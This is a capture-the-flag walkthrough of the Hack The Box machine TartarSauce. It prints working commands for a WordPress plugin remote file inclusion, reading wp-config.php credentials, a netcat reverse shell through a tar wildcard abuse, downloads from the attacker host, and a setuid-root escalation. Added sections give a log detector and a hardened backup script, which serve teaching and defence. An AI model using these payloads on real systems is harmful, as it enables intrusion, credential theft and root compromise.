[HTB Notes] TartarSauce

1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.88
# 80/tcp open  http
nmap -oN tartarsauce.nmap -p80 -sC -sV -v 10.10.10.88
# 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
# | http-methods:
# |_  Supported Methods: GET HEAD POST OPTIONS
# | http-robots.txt: 5 disallowed entries
# | /webservices/tar/tar/source/
# | /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
# |_/webservices/developmental/ /webservices/phpmyadmin/
# |_http-server-header: Apache/2.4.18 (Ubuntu)
# |_http-title: Landing Page

2. Explore webservices on port 80
[x] Login as:
[x] USERNAME: admin
[x] PASSWORD: admin
[x] Exploit webservice [RABBIT HOLE]
[x] Run gobuster on http://10.10.10.88/
gobuster -u http://10.10.10.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# /webservices (Status: 301)
gobuster -u http://10.10.10.88/webservices -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# /wp (Status: 301)
nikto -host http://10.10.10.88/webservices/wp/
# + Uncommon header 'link' found, with contents:
#     <http:/10.10.10.88/webservices/wp/index.php/wp-json/>;
#     rel="https://api.w.org/"
"\/wp\/v2":{ ... }
"\/wp\/v2\/posts":{ ... }
"\/wp\/v2\/pages":{ ... }
[x] Contains a page with a Gwolle Guestbook plugin
[x] Search available exploits for Gwolle Guestbook
searchsploit gwolle
# WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
[x] Check plugin version in /wp-content/plugins/gwolle-gb/readme.txt
[*] “Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D”
[x] Exploit Gwolle Guestbook (CVE-2015-8351)
[x] Start HTTP server in your working directory
python -m SimpleHTTPServer
# Serving HTTP on 0.0.0.0 port 8000 ...
[x] Create file called wp-load.php
echo '<?php echo shell_exec("id"); ?>' > wp-load.php
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
echo '<?php echo shell_exec("cat /etc/passwd"); ?>' > wp-load.php
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
# onuma:x:1000:1000:,,,:/home/onuma:/bin/bash
echo '<?php echo shell_exec("cat /var/www/html/webservices/wp/wp-config.php"); ?>' > wp-load.php
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
# /** MySQL database username */
# define('DB_USER', 'wpuser');
#
# /** MySQL database password */
# define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');
echo '<?php echo shell_exec("mysql -uwpuser -pw0rdpr3$\$d@t@b@$3@cc3$$ -e \"SHOW DATABASES\""); ?>' > wp-load.php
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
# [RABBIT HOLE]
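From the defender's side, the file inclusion above leaves a recognisable trace in the web server's access log: a request to the plugin's ajaxresponse.php whose abspath parameter carries a remote URL, which the legitimate captcha call never sends. The following is an added example, not part of the original notes, of a small POSIX sh detector run over Apache combined-format log lines; every line in SAMPLE_LOG (addresses, timestamps, user agents) is constructed for this example, and the function names are invented here.

```shell
#!/bin/sh
# Added example (not from the original notes): spot Gwolle Guestbook RFI
# attempts (CVE-2015-8351) in Apache combined-format access logs.
# The endpoint is the one used in the notes above; every log line below is
# constructed for this example.

SAMPLE_LOG='10.10.14.2 - - [20/Oct/2018:01:30:01 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.2:8000/ HTTP/1.1" 200 54 "-" "curl/7.61.0"
10.10.14.9 - - [20/Oct/2018:01:30:05 +0000] "GET /webservices/wp/index.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
10.10.14.2 - - [20/Oct/2018:01:31:10 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=HTTPS%3A%2F%2Fevil.example%2F HTTP/1.1" 200 54 "-" "curl/7.61.0"
10.10.14.5 - - [20/Oct/2018:01:32:00 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"'

# Print every log line (from stdin) that calls ajaxresponse.php with an
# abspath pointing at a remote scheme.  The genuine captcha call never sends
# abspath at all, so any remote value is an attempt to pull in a foreign
# wp-load.php.  The match is case-insensitive and also catches a URL-encoded
# "://" (%3A%2F%2F), which slips past a naive "http://" signature.
detect_gwolle_rfi() {
    grep -iE 'ajaxresponse\.php\?[^ "]*abspath=(https?|ftp)(://|%3a%2f%2f)'
}

# Number of matching lines on stdin ("0" when there are none).
count_gwolle_rfi() {
    detect_gwolle_rfi | wc -l | tr -d ' '
}

# Source addresses of the offenders, with a hit count per address.
rfi_sources() {
    detect_gwolle_rfi | awk '{ print $1 }' | sort | uniq -c
}

printf '%s\n' "$SAMPLE_LOG" | rfi_sources
```

On the sample input the detector flags the two requests from 10.10.14.2 and ignores the other two. On the server side the fix is to update the plugin past 1.5.3 (the readme on this box was edited to claim 2.3.10, so check the code, not the readme); keeping PHP's allow_url_include=Off also makes the include of a remote abspath fail even on an unpatched plugin.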

3. Attempt Privilege Escalation (www-data -> onuma)
[x] Check Privileges
echo '<?php echo shell_exec("sudo -l"); ?>' > wp-load.php
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
# User www-data may run the following commands on TartarSauce:
#     (onuma) NOPASSWD: /bin/tar
[x] Exploit tar wildcard to generate reverse shell
[x] Update wp-load.php
<?php
$htb_ipv4 = "0.0.0.0"; // CHANGE THIS
$payload = "rm /tmp/x; mkfifo /tmp/x; cat /tmp/x | /bin/bash -i 2>&1 | nc ".$htb_ipv4." 4444 > /tmp/x";
file_put_contents("shell.sh", $payload);

shell_exec("chmod +x shell.sh");
shell_exec("echo > --checkpoint=1");
shell_exec("echo > --checkpoint-action=exec=sh\ shell.sh");

$tar = "sudo -u onuma /bin/tar ";
shell_exec($tar."-cvf /tmp/something.tar *");
?>
[x] Set-up netcat listener on local machine
nc -lvp 4444
# listening on [any] 4444 ...
[x] Run Gwolle Guestbook exploit
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
[x] While inside user (onuma) shell
id
# uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
find ~ -name user.txt
# /home/onuma/user.txt
cat /home/onuma/user.txt
# b2d6ec45472467c836f253bd170182c7

4. Attempt Privilege Escalation (onuma -> root)
[x] Check system architecture
uname -a
# Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
#
# System runs on a 32-bit processor
[x] Upload and run pspy (32-bit)
cd /tmp
wget http://HTB_IPv4:8000/pspy32s
chmod +x pspy32s
./pspy32s
# CMD: UID=0 | /bin/bash /usr/sbin/backuperer
[x] backuperer script runs every 5 minutes
[x] Check out backuperer script
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
[1] /var/www/html is backed up to $tmpfile
[x] the filename is a random string every time
[2] The script sleeps 30 seconds to wait for the backup to finish
[3] Extracts $tmpfile into $check and diffs the result against /var/www/html; on a mismatch it exits without cleaning $check up
[x] Exploit integrity_chk() in backuperer script
[x] Create SUID payload using C (suid.c)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    system("id");
    system("/bin/bash");

    return 0;
}
[x] Compile suid.c as a 32-bit executable
gcc -m32 -o suid suid.c
file ./suid
# ... ELF 32-bit LSB pie executable ...
[x] Update wp-load.php
<?php
$htb_ipv4 = "0.0.0.0"; // CHANGE THIS

shell_exec("wget http://".$htb_ipv4.":8000/suid");
shell_exec("mv suid /var/www/html/suid");
shell_exec("chmod 4755 /var/www/html/suid");

$backuperer = ""; // FILENAME OF BACKUP FILE IN /var/tmp/
$tar = "sudo -u onuma /bin/tar ";
shell_exec($tar."-zcvf /var/tmp/".$backuperer." --owner=0 --group=0 /var/www/html/suid");

shell_exec("rm /var/www/html/suid");
?>
[x] When backuperer sleeps for 30 seconds:
[x] Copy the backup’s filename saved in /var/tmp/
[x] Update $backuperer in wp-load.php
[x] Run Gwolle Guestbook exploit
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
[x] After integrity_chk() runs:
cd /var/tmp/check/var/www/html
ls -la
# -rwsr-xr-x 1 root root 15480 Oct 20 01:36 suid
./suid
# uid=0(root) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
[x] While inside root shell:
find / -name root.txt
# /root/root.txt
cat /root/root.txt
# e79abdab8b8a4b64f8579a10b2cd09f9
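The root step works because backuperer trusts an archive that another user can rewrite during the 30-second sleep, extracts it as root with ownership and setuid bits preserved, and on a failed integrity check leaves the extracted tree behind in a predictable /var/tmp/check. The script below is an added example, not the box's backuperer and not part of the original notes, showing how the same backup-and-verify job looks with those three problems removed; safe_backup and listing_is_unsafe are names invented here, the routine assumes a GNU or BSD tar that understands --no-same-owner and --no-same-permissions, and the listing lines checked at the end are constructed in the shape tar -tvf prints. Because root creates the archive itself, the script no longer needs any sudo rule for tar, and the www-data rule (onuma) NOPASSWD: /bin/tar that section 3 abused is the sudoers entry to remove.

```shell
#!/bin/sh
# Added example (not the original backuperer): a hardened backup-and-verify
# routine for the same job.  Differences that matter:
#   * the archive is written by this script into a fresh mode-0700 scratch
#     directory from mktemp, so no other user can swap it out during the run
#     (the original wrote it as onuma into world-writable /var/tmp and slept)
#   * the archive listing is inspected before anything is extracted
#   * extraction uses --no-same-owner --no-same-permissions, so a setuid entry
#     in the archive cannot become a root-owned setuid file on disk
#   * the scratch directory is removed on every exit path, so a failed
#     integrity check leaves nothing behind for anyone to collect

# Read a `tar -tvf` listing on stdin; succeed (exit 0) if any entry carries a
# setuid/setgid bit or a path that could escape the extraction directory.
listing_is_unsafe() {
    awk '{
        mode = $1; name = $NF
        # mode looks like -rwsr-xr-x: position 4 is setuid, position 7 setgid
        if (substr(mode, 4, 1) ~ /[sS]/ || substr(mode, 7, 1) ~ /[sS]/) bad = 1
        # absolute paths and ".." components are rejected outright
        if (name ~ /^\// || name ~ /(^|\/)\.\.(\/|$)/) bad = 1
    } END { exit !bad }'
}

# safe_backup SRC_DIR DEST_DIR
# Archives SRC_DIR to DEST_DIR/onuma-www-dev.bak after verifying the archive
# in a private scratch directory.  Returns 0 on success, 1 on a tool failure,
# 2 when the archive fails inspection or the integrity check.
safe_backup() {
    src=$1
    dest=$2
    scratch=$(mktemp -d "${TMPDIR:-/tmp}/backuperer.XXXXXX") || return 1
    chmod 700 "$scratch"
    archive=$scratch/archive.tgz
    rc=0

    # Create the archive ourselves, relative to the parent of SRC_DIR.
    if ! tar -C "$(dirname "$src")" -zcf "$archive" "$(basename "$src")"; then
        rc=1
    elif tar -tzvf "$archive" | listing_is_unsafe; then
        rc=2
    else
        mkdir "$scratch/check"
        if ! tar -C "$scratch/check" --no-same-owner --no-same-permissions -zxf "$archive"; then
            rc=1
        elif ! diff -r "$src" "$scratch/check/$(basename "$src")" >/dev/null; then
            rc=2
        elif ! mv "$archive" "$dest/onuma-www-dev.bak"; then
            rc=1
        fi
    fi

    rm -rf "$scratch"       # always, whatever happened above
    return "$rc"
}
```

Usage is safe_backup /var/www/html /var/backups from a root cron job. The listing check is deliberately separate from the extraction so it can be reused for any archive that root is about to unpack, and the return codes distinguish a broken tool (1) from an archive that should be investigated (2).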